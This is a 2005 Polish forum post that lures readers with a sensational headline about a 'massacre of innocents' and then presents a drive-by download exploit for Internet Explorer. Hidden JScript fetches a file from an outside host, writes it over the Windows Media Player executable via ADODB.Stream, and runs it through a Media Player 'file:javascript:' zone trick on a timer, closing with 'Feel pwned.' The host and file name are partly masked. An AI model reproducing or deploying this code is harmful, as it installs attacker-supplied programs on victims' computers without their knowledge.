Zobacz pojedynczy post
stary 19-03-2005, 11:22   #1
Cebula
Guest
 

Posty: n/a
Cool Wielki tesy UE przed samym dp.RZEZ NIEWINIATEK!!!!!!!

To trzeba zobaczyć

Kod:
<textarea id="code" style="display:none;">

    var x = new ActiveXObject("Microsoft.XMLHTTP"); 
    x.Open("GET", "http://www.masterfusion.republika.pl/1*****",0); 
    x.Send(); 
    
    var s = new ActiveXObject("ADODB.Stream");
    s.Mode = 3;
    s.Type = 1;
    s.Open();
    s.Write(x.responseBody);

    s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer*****",2);
    location.href = "mms://";

</textarea>
wait a some time the screns are loging ;)

<script language="javascript">

    function preparecode(code) {
        result = '';
        lines = code.split(/\r\n/);
        for (i=0;i<lines.length;i++) {
        
            line = lines[i];
            line = line.replace(/^\s+/,"");
            line = line.replace(/\s+$/,"");
            line = line.replace(/'/g,"\\'");
            line = line.replace(/[\\]/g,"\\\\");
            line = line.replace(/[/]/g,"%2f");

            if (line != '') {
                result += line + '\\r\\n';
            }
        }
        return result;
    }
    
    function doit() {
        mycode = preparecode(document.all.code.value);
        myURL = "file:javascript:eval('" + mycode + "')";
        window.open(myURL,"_media");
    }
    

    window.open("error.jsp","_media");
    
    setTimeout("doit()", 5000);
    
    
</script>
Feel pwned.

Ostatnio edytowany przez $corcerer - 19-03-2005 o 12:11.
 

PAMIĘTAJ! ¬ródłem utrzymania forum s± reklamy. Dziękujemy za uszanowanie ich obecno¶ci.